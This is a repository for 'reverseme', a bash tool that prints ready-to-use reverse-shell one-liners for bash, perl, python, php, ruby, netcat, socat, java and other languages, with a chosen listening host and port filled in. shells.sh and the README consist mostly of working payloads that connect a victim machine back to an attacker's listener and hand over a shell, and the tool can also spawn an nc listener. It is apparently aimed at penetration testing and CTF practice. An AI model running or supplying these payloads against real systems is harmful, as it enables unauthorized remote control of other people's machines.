README.md
# ReverseMe
Easily display reverse shells in different languages with the listening host and listening port already built into the syntax.

## Installation
By default, *reverseme* is set to install in your home directory. \
Using your favorite text editor, change the username for the USER variable in *install.sh*. \
Also change the directory path for the DIRECTORY variable in *install.sh*. **Use absolute path names. It just makes it easier.** \
*reverseme* uses \.bash_aliases to add the alais for *reverseme*. \
*reversme* will source the bash_completion file automatically to your \.bashrc file.

##### What if I want to use something different than .bashrc or .bash_aliases?
You will need to use your favorite text editor and edit the variables ALIAS_FILE and SOURCE_FILE in *install.sh*. \
**Otherwise, leave them alone.**

##### What if I move *reverseme* after I run the install.sh script?
If at anytime you move *reverseme* after running install.sh, you will need to edit your \.bashrc, \.bash_aliases, and the absolute sourced path of *shells.sh* in *main.sh* file, using your favorite text editor.

#### To install:
```
git clone https://github.com/DFC302/reverseme.git
cd reverseme/
sudo bash install.sh
cd
source ~/.bashrc
```
**Right now, *reverseme's* *install.sh* script is set to work on Debian\Ubuntu related distbutions.**

## Usage
**Important Note:** \
The reverse shells are stored in a separate file wrapped in functions. Because of this, all other options must be called FIRST before you call the language option of your choice. Below are some simple example usages.

### Basic usage:
```
reverseme --lport 4444 --lhost 10.0.0.221 --langs bash
```

#### Result:
```
bash -i >& /dev/tcp/10.0.0.221/4444 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/10.0.0.221/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/10.0.0.221/4444 cat <&5 | while read line; do  2>&5 >&5; done
```

### Save shell to clipboard"
```
reverseme --lhost 10.0.0.221 --lport 4444 --save --langs bash
```

**If there is more than one reverse shell available, *reverseme* will ask you to select which one. Whatever option you choose will automatically be saved to your clipboard.**.

#### Result
```
bash -i >& /dev/tcp/10.0.0.221/4444 0>&1

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/10.0.0.221/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/10.0.0.221/4444 cat <&5 | while read line; do  2>&5 >&5; done

Selection [1-4]: 2
```

### List supported languages
```
reverseme --list
```
#### Result:
```
Supported languages:
	bash
	awk
	perl
	python
	php
	ruby
	netcat
	telnet
	socat
	java
```
### Spawn listener
```
reverseme --lport 4444 --listener gnome
```
**--OR--**
```
reverseme --lhost 10.0.0.221 --lport 4444 [optional: --save] --listener gnome --langs bash
```
This will spawn a new terminal using netcat to listen on the given lport.

### Spawn version/email/title information
```
reverseme --version
```
#### Result:
```
	________                                    ______  ___     
	___  __ \_______   ____________________________   |/  /____ 
	__  /_/ /  _ \_ | / /  _ \_  ___/_  ___/  _ \_  /|_/ /_  _ \
	_  _, _//  __/_ |/ //  __/  /   _(__  )/  __/  /  / / /  __/
	/_/ |_| \___/_____/ \___//_/    /____/ \___//_/  /_/  \___/                                                               

	
		Written by: Matthew Greer
		Github: https://github.com/DFC302
		HTB Profile: https://www.hackthebox.eu/profile/17842
		Email: pydev302@gmail.com
		Version: 2.0.0


```


### Help Menu
```
reverseme - A quick reference script that can easily display reverse shells for different languages.
Version: 2.0.0

Usage: reverseme --[options]
Example usage: reverseme --lhost 10.0.0.2 --lport 4444 --langs perl linux
Warning: lport and lhost both needed FIRST to display reverse shells correctly!
	WRONG: reverseme --langs bash --lhost 10.0.0.2 --lport 4444
	CORRECT: reverseme --lhost 10.0.0.2 || lport 4444 --langs bash

--help			Displays this help menu and exits.
--version		Displays version and title information.
--list			List avaialble languages supported.
--save			Save reverse shell to clipboard.
--lport=[port]		Provide a listening port.
--lhost=[IP]		Provide a listening host.

--listener=[ENV]	Spawn a listener on a specfic lport.
				gnome
				xfce
				Example: --lport 4444 --listener gnome

--langs=[lang]	Language reverse shell is written in.
			bash
			awk
			perl [OPTIONAL] linux || windows
			python [PROTOCOL] tcp || udp || stcp
			php
			ruby [OPTIONAL] linux || windows
			netcat
			telnet
			socat
			java

```

### Common errors?
#### When I use the --save flag, I get an error: *error cant open display*.
This usually happens with systems without a GUI. You can check out the following [help](https://askubuntu.com/questions/305654/xclip-on-headless-server) to see if you can find a solution.

#### *reverseme* tells me that I need the lhost and/or lport first, when I use the --langs flag before those flags.
This is because each language is stored in a function in another bash file. Essentially, main.sh is calling the function that holds the reverse shells of the language you have chosen. If you call that function first, the rest of the flags are not taken into account as variables. Use the *--langs [lang]* as the last part of your syntax.

#### I am getting a *permission denied* when running *reverseme*.
I have seen this before on some of the test systems I have tested *reverseme* on. The easiest solution is to do this:
```
chmod -R 755 /reverseme
chown -R [user] /reverseme
chgrp -R [user] /reverseme
```
#### I ran the *install.sh* script, but I still cant use *reverseme* as an alias?
Using your favorite editor, open the \.bash_aliases file in your home directory. Make sure that the path to *reverseme's* *main.sh* file is correct.

#### *reverseme* tells me that it has no file named *shells.sh*
Using your favorite editor, open the *main.sh* file in *reverseme* directory. Edit line 4, where it is sourcing the *shells.sh* file and make sure the path is correct.

**Anything else. Email me.**


### Contributing?
I would be interested in more reverse shells that I can add to *reverseme* \
Or if you find this useful or it is helped you in anyway, you can always say thanks by buying me a coffee.

<a href="https://www.buymeacoffee.com/dfc302" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>


CHANGELOG.md
Monday May 25, 2020

### Removed:
* Colormode removed (may be added again in future update).
* No longer will display title information on every use.
* -H flag changed to --lhost
* -L flag changed to --lport
* -S flag removed. Now language flags are used. (EX: bash or awk).
* -l flag removed. Now --listener.
* -d flag changed to --list to display supported languages.
* -V flag changed to --version.
* -s flag removed.

### New:
* Better command flags introduced.
* --langs flag added to specify languages.
* --list flag added.
* Edited help menu.
* Install file introduced for installation.
* Bash completion file introduced.
* New listener environment added (xfce).
* Ability to save reverse shell automatically to clipboard. (Uses xclip).
* Version information, title information, and contact information now moved under --version flag.


shells.sh
#!/bin/bash

function check_lhost_check_lport() {
	if [[ -z ${LHOST} ]] || [[ -z ${LPORT} ]] ; then
    	echo "No listening host provided!"
    	echo -e "\t     OR"
    	echo "No listening port provided!"
    	exit 1
    fi
}

function bash() {
	check_lhost_check_lport

	echo ""
	echo "bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1"
	echo ""
	echo "exec /bin/bash 0&0 2>&0"
	echo ""
	echo "0<&196;exec 196<>/dev/tcp/${LHOST}/${LPORT}; sh <&196 >&196 2>&196"
	echo ""
	echo "exec 5<>/dev/tcp/${LHOST}/${LPORT} cat <&5 | while read line; do $line 2>&5 >&5; done"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		read -p "Selection [1-4]: " SEL

		if [ -z ${SEL} ] ; then
			echo "No selection made!"
			exit 1

		elif [ ${SEL} -eq 1 ] ; then
			printf "bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 2 ] ; then
			printf "exec /bin/bash 0&0 2>&0" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 3 ] ; then
			printf "0<&196;exec 196<>/dev/tcp/${LHOST}/${LPORT}; sh <&196 >&196 2>&196" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 4 ] ; then
			printf "exec 5<>/dev/tcp/${LHOST}/${LPORT} cat <&5 | while read line; do $line 2>&5 >&5; done" | xclip -i -selection clipboard
		
		elif [ ${SEL} -gt 4 ] ; then
			printf "Selection higher than reverse shells available!"
			exit 1
		fi
	fi
}

function awk() {
	check_lhost_check_lport

	echo ""
	echo "awk 'BEGIN {s = \"/inet/tcp/0/${LHOST}/${LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		printf "awk 'BEGIN {s = \"/inet/tcp/0/${LHOST}/${LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}'" /dev/null | xclip -i -selection clipboard
	fi
}

function perl() {
	check_lhost_check_lport

	if [ -z ${OS} ] ; then
		echo ""
		echo "perl -e 'use Socket;$i=\"${LHOST}\";\$p=${LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "perl -e 'use Socket;$i=\"${LHOST}\";\$p=${LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" | xclip -selection clipboard
		fi

	elif [ ${OS} == "linux" ] ; then
		echo ""
		echo "perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
		echo ""
		echo "perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			read -p "Selection [1-2]: " SEL

			if [ -z ${SEL} ] ; then
				echo "No selection made!"
				exit 1

			elif [ ${SEL} -eq 1 ] ; then
				printf "perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'" | xclip -i -selection clipboard

			elif [ ${SEL} -eq 2 ] ; then
				printf "perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'" | xclip -i -selection clipboard
			
			elif [ ${SEL} -gt 2 ] ; then
				echo "Selection higher than reverse shells available!"
				exit 1
			fi
		fi

	elif [ ${OS} == "windows" ] ; then
		echo ""
		echo "perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"${LHOST}:${LPORT}\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'" | xclip -i -selection clipboard
		fi
	fi
}

function python() {
	check_lhost_check_lport

	if [ -z ${PROTOCOL} ] ; then
		echo "No protocol selected!"
		echo "Protocol needed!"
		echo -e "\nProtocols:\n\ttcp\n\tudp\n\tstcp\n"

	elif [ ${PROTOCOL} == "tcp" ] ; then
		echo ""
		echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" | xclip -i -selection clipboard
		fi	

	elif [ ${PROTOCOL} == "udp" ] ; then
		echo ""
		echo "python -c 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn([\"/bin/bash\",\"-i\"]);s.close();'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "python -c 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn([\"/bin/bash\",\"-i\"]);s.close();'" | xclip -i -selection clipboard
		fi

	elif [ ${PROTOCOL} == "stcp" ] ; then
		echo ""
		echo "python -c 'import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "\tpython -c 'import os,pty,socket,sctp;s=sctp.sctpsocket_tcp(socket.AF_INET);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();'" | xclip -i -selection clipboard
		fi
	fi
}

function php() {
	check_lhost_check_lport

	echo ""
	echo "php -r '$sock=fsockopen(\"${LHOST}\",${LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		printf "php -r '$sock=fsockopen(\"${LHOST}\",${LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'" | xclip -i -selection clipboard
	fi
}

function ruby() {
	check_lhost_check_lport

	if [ -z ${OS} ] ; then
		echo ""
		echo "ruby -rsocket -e'f=TCPSocket.open(\"${LHOST}\",${LPORT}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "ruby -rsocket -e'f=TCPSocket.open(\"${LHOST}\",${LPORT}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" | xclip -i -selection clipboard
		fi

	elif [ ${OS} == "linux" ] ; then
		echo ""
		echo "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"${LHOST}\",\"${LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"${LHOST}\",\"${LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'" | xclip -i -selection clipboard
		fi

	elif [ ${OS} == "windows" ] ; then
		echo ""
		echo "ruby -rsocket -e 'c=TCPSocket.new(\"${LHOST}\",\"${LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
		echo ""

		if [[ ${SAVE} == "True" ]] ; then
			printf "ruby -rsocket -e 'c=TCPSocket.new(\"${LHOST}\",\"${LPORT}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'" | xclip -i -selection clipboard
		fi
	fi
}

function netcat() {
	check_lhost_check_lport

	echo ""
	echo "nc -e /bin/sh ${LHOST} ${LPORT}"
	echo ""
	echo "nc -c /bin/sh ${LHOST} ${LPORT}"
	echo ""
	echo "/bin/sh | nc ${LHOST} ${LPORT}"
	echo ""
	echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${LHOST} ${LPORT} >/tmp/f"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		read -p "Selection [1-4]: " SEL

		if [ -z ${SEL} ] ; then
			echo "No selection made!"
			exit 1

		elif [ ${SEL} -eq 1 ] ; then
			printf "nc -e /bin/sh ${LHOST} ${LPORT}" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 2 ] ; then
			printf "nc -c /bin/sh ${LHOST} ${LPORT}" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 3 ] ; then
			printf "/bin/sh | nc ${LHOST} ${LPORT}" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 4 ] ; then
			print "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ${LHOST} ${LPORT} >/tmp/f" | xclip -i -selection clipboard

		elif [ ${SEL} -gt 4 ] ; then
			echo "Selection higher than reverse shells available!"
			exit 1
		fi
	fi
}

function telnet() {
	check_lhost_check_lport

	echo ""
	echo "rm -f /tmp/p; mknod /tmp/p p && telnet ${LHOST} ${LPORT} 0/tmp/p"
	echo ""
	echo "telnet ${LHOST} ${LPORT} | /bin/bash | telnet ${HOST} 4445"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		read -p "Selection [1-2]: " SEL

		if [ -z ${SEL} ] ; then
			echo "No selection made!"
			exit 1

		elif [ ${SEL} -eq 1 ] ; then
			printf "rm -f /tmp/p; mknod /tmp/p p && telnet ${LHOST} ${LPORT} 0/tmp/p" | xclip -i -selection clipboard

		elif [ ${SEL} -eq 2 ] ; then
			printf "telnet ${LHOST} ${LPORT} | /bin/bash | telnet ${HOST} 4445" | xclip -i -selection clipboard

		elif [ ${SEL} -gt 2 ] || [ ${SEL} -lt 1 ] ; then
			echo "Selection higher than reverse shells available!"
			exit 1
		fi

	fi
}

function socat() {
	check_lhost_check_lport

	echo ""
	echo "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LHOST}:${LPORT}"
	echo ""

	if [[ ${SAVE} == "True" ]] ; then
		printf "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:${LHOST}:${LPORT}" | xclip -i -selection clipboard
	fi
}

function java()  {
	check_lhost_check_lport

	echo ""
	echo -e "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/${LHOST}/${LPORT};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()"
    echo ""

    if [[ ${SAVE} == "True" ]] ; then
    	printf "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/${LHOST}/${LPORT};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" | xclip -i -selection clipboard
    fi
}

function listener() {
	if [ -z ${ENV} ] ; then
		echo "Environment needed to spawn correct terminal."
		echo -e "\nSupported Terminals:\n\tgnome\n\txfce\n\tcinnamon\n\tKDE\n"
		exit 1

	elif [ ${ENV} == "gnome" ] ; then
		gnome-terminal -e "nc -lvp ${LPORT}"

	elif [ ${ENV} == "xfce" ] ; then
		xfce4-terminal -e "nc -lvp ${LPORT}"

	else
		echo "Environment ${ENV} not recognized or supported at this time."
		exit 1
	fi
}

install.sh
#!/bin/bash

# Place username here
USER=

# Where will reverseme be located at?
# Please use absolute path
# By default, reverseme is installed in the home directory of the specificed user
# It is better to use absolute path because this script will be run by root instead of the local user
DIRECTORY=/home/${USER}/reverseme

# This variable holds the file location for your .bash_aliases
# Use absolute path because this script will be run by root instead of the local user
ALIAS_FILE=/home/${USER}/.bash_aliases

# Default file that bash uses before starting the interactive shell
# By default it is .bashrc
# However, you can change it to any one you like.
# Some newer Ubuntu systems use .profile. If you wish, I have built one for .profile below. Just edit this one out.
SOURCE_FILE=/home/${USER}/.bashrc
#Source_FILE=/home/${USER}/.profile

# Check if user is root
if [[ $EUID -ne 0 ]] ; then
	echo "Please run me as root!"
	exit 1
fi

# Check if user variable is blank
if [ -z ${USER} ] ; then
	echo "User varialbe was left blank. Please add a user!"
	exit 1

fi

# Check if directory variable is blank
if [ -z ${DIRECTORY} ] ; then
	echo "Directory variable was left blank. Please add an absolute path on where reverseme will be installed!."
	exit 1
fi

# Make sure directory variable has /reverseme on the end, with no leading "/"
if [[ ${DIRECTORY} =~ /reverseme/$ ]] ; then
    DIRECTORY=$(echo ${DIRECTORY} | sed 's/\/*$//g')
fi

# Make sure directory exists
if [ ! -d ${DIR} ] ; then
	echo "This directory was not found!"
	echo "Are you sure the correct directory is being used?"
	exit 1

# if directory exists proceed
elif [ -d ${DIR} ] ; then
	if [ ! -f ${ALIAS_FILE} ] ; then
		echo "Alias file: ${ALIAS_FILE} not found. Creating now..."
		touch ${ALIAS_FILE}
		echo "File created!"
	fi

	echo -e "\n# reverseme" >> ${ALIAS_FILE}
	echo -e "alias reverseme='/usr/bin/bash ${DIRECTORY}/main.sh'" >> ${ALIAS_FILE}
	echo -e "\nsource ${DIRECTORY}/reverseme_completion.bash" >> ${SOURCE_FILE}
fi

# source shells.sh script into main.sh for user
sed -i "4i\\. ${DIRECTORY}/shells.sh" main.sh

# If user is using apt package manager, check if xclip is installed.
# If not attempt to install.
echo "Checking if xclip is installed..."
xclip -h > /dev/null 2>&1 \
|| apt install xclip -y ; exit 0


reverseme_completion.bash
#!/usr/bin/env bash

_reverseme() {
	COMREPLY=()

	cur="${COMP_WORDS[COMP_CWORD]}"
    prev="${COMP_WORDS[COMP_CWORD-1]}"
    next="${COMP_WORDS[COMP_CWORD+1]}"
   
	info_commands="--help \
		--version \
		--langs \
		--lhost \
		--lport \
		--listener \
		--list \
		--save"

	shells="bash \
		awk \
		perl \
		python \
		php \
		ruby \
		netcat \
		telnet \
		socat \
		java"

  	perl_options="linux windows"
  	python_options="tcp udp stcp"
  	ruby_options="linux windows"
  	list_options="gnome xfce"

  	case "${prev}" in
  		--langs)
			COMPREPLY=( $(compgen -W "${shells}" ${cur}) )
			return 0
		;;
		perl)
			COMPREPLY=( $(compgen -W "${perl_options}" ${cur}) )
			return 0	
		;;
		python)
			COMPREPLY=( $(compgen -W "${python_options}" ${cur}) )
			return 0	
		;;
		ruby)
			COMPREPLY=( $(compgen -W "${ruby_options}" ${cur}) )
			return 0	
		;;
		--listener)
			COMPREPLY=( $(compgen -W "${list_options}" ${cur}) )
			return 0
		;;
    esac


    COMPREPLY=($(compgen -W "${info_commands}" -- ${cur}))
   	return 0
}

complete -F _reverseme reverseme

main.sh
#!/bin/bash

# source absolute path

function helpMenu() {
	ORG='\033[0;33m'
	RED='\033[0;31m'
	GREEN='\033[0;32m'
	NC='\033[0m'

	echo "reverseme - A quick reference script that can easily display reverse shells for different languages."
    echo "Version: 2.0.0"
    echo ""
    echo "Usage: reverseme --[options]"
    echo "Example usage: reverseme --lhost 10.0.0.2 --lport 4444 --langs perl linux"
    echo -e "${ORG}Warning: lport and lhost both needed FIRST to display reverse shells correctly!${NC}"
    echo -e "${RED}\tWRONG: reverseme --langs bash --lhost 10.0.0.2 --lport 4444${NC}"
    echo -e "${GREEN}\tCORRECT: reverseme --lhost 10.0.0.2 || lport 4444 --langs bash${NC}"
    echo ""
    echo -e "--help\t\t\tDisplays this help menu and exits."
    echo -e "--version\t\tDisplays version and title information."
    echo -e "--list\t\t\tList avaialble languages supported."
    echo -e "--save\t\t\tSave reverse shell to clipboard."
    echo -e "--lport=[port]\t\tProvide a listening port."
    echo -e "--lhost=[IP]\t\tProvide a listening host."
    echo ""
    echo -e "--listener=[ENV]\tSpawn a listener on a specfic lport."
    echo -e "\t\t\t\tgnome"
    echo -e "\t\t\t\txfce"
    echo -e "\t\t\t\t${GREEN}Example: --lport 4444 --listener gnome${NC}"
    echo ""
    echo -e "--langs=[lang]\tLanguage reverse shell is written in."
    echo -e "\t\t\tbash"
    echo -e "\t\t\tawk"
    echo -e "\t\t\tperl [OPTIONAL] linux || windows"
    echo -e "\t\t\tpython [PROTOCOL] tcp || udp || stcp"
    echo -e "\t\t\tphp"
    echo -e "\t\t\truby [OPTIONAL] linux || windows"
    echo -e "\t\t\tnetcat"
    echo -e "\t\t\ttelnet"
    echo -e "\t\t\tsocat"
    echo -e "\t\t\tjava"
    echo ""
}

function display_avail_languages() {
	echo ""
	echo "Supported languages:"
	echo -e "\tbash"
	echo -e "\tawk"
	echo -e "\tperl"
	echo -e "\tpython"
	echo -e "\tphp"
	echo -e "\truby"
	echo -e "\tnetcat"
	echo -e "\ttelnet"
	echo -e "\tsocat"
	echo -e "\tjava"
	echo ""

}

function version() {
	RED='\033[0;31m'
	NC='\033[0m'

	echo -e """\n${RED}
	________                                    ______  ___
	___  __ \_______   ____________________________   |/  /____
	__  /_/ /  _ \_ | / /  _ \_  ___/_  ___/  _ \_  /|_/ /_  _ \\
	_  _, _//  __/_ |/ //  __/  /   _(__  )/  __/  /  / / /  __/
	/_/ |_| \___/_____/ \___//_/    /____/ \___//_/  /_/  \___/

	${NC}"""

	echo -e "${RED}\t\tWritten by:${NC} Matthew Greer"
	echo -e "${RED}\t\tGithub:${NC} https://github.com/DFC302"
	echo -e "${RED}\t\tHTB Profile:${NC} https://www.hackthebox.eu/profile/17842"
	echo -e "${RED}\t\tEmail:${NC} pydev302@gmail.com"
	echo -e "${RED}\t\tVersion:${NC} 2.0.0"
	echo ""
}

function exampleUsage() {
	echo -e "\nExample usage: reverseme --lhost 10.0.0.2 || lport 4444 --bash${NC}"
	echo -e "|| = either or first\n"
}

if [ $# -eq 0 ] ; then
	helpMenu
	exit 0

else

	while [ ! $# -eq 0 ] ; do
		case "$1" in
			--help)
				helpMenu
				exit 0
				;;
			--version)
				version
				exit 0
				;;
			--list)
				display_avail_languages
				exit 0
				;;
			--lhost)
				LHOST=$2
				if [[ ! ${LHOST} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] ; then
    				echo "Not a valid IP!"
    				exit 1
    			fi
				;;
			--lport)
				LPORT=$2
				if [[ ! ${LPORT} =~ ^[0-9]{1,5}$ ]] ; then
    				echo "Not a valid port!"
    				exit 1
				fi
				;;
			--langs)
				SEL=${2,,}
				LANGS=(
					"bash"
					"awk"
					"perl"

				)
				if [ -z ${LPORT} ] ; then
					echo "Listening port needed before revese shell language selection"
					exampleUsage
					exit 1
				elif [ -z ${LHOST} ] ; then
					echo "Listening host needed before revese shell language selection"
					exampleUsage
					exit 1
				else
					for lang in "${LANGS[@]}" ; do

						if [[ ${SEL} == "bash" ]] ; then
							bash
							break

						elif [[ ${SEL} == "awk" ]] ; then
							awk
							break

						elif [[ ${SEL} == "perl" ]] ; then
							OS=${3,,}
			 				perl
			 				break

			 			elif [[ ${SEL} == "python" ]] ; then
			 				PROTOCOL=${3,,}
							python
							break

						elif [[ ${SEL} == "php" ]] ; then
							php
							break

						elif [[ ${SEL} == "ruby" ]] ; then
							OS=${3,,}
							ruby
							break

						elif [[ ${SEL} == "netcat" ]] ; then
							netcat
							break

						elif [[ ${SEL} == "telnet" ]] ; then
							telnet
							break

						elif [[ ${SEL} == "socat" ]] ; then
							socat
							break 

						elif [[ ${SEL} == "java" ]] ; then
							java
							break
						fi
					done
				fi
			;;
			
			--listener)
				if [ -z ${LPORT} ] ; then
					echo "Listening port needed for listener!"
					echo -e "Example usage: --lport 4444 --listener xfce || gnome"
					echo -e "|| = either or first"
					exit 1
				fi
				ENV=${2,,}
				listener
				;;
			--save)
				SAVE=True
				;;
		esac
		shift
	done
fi
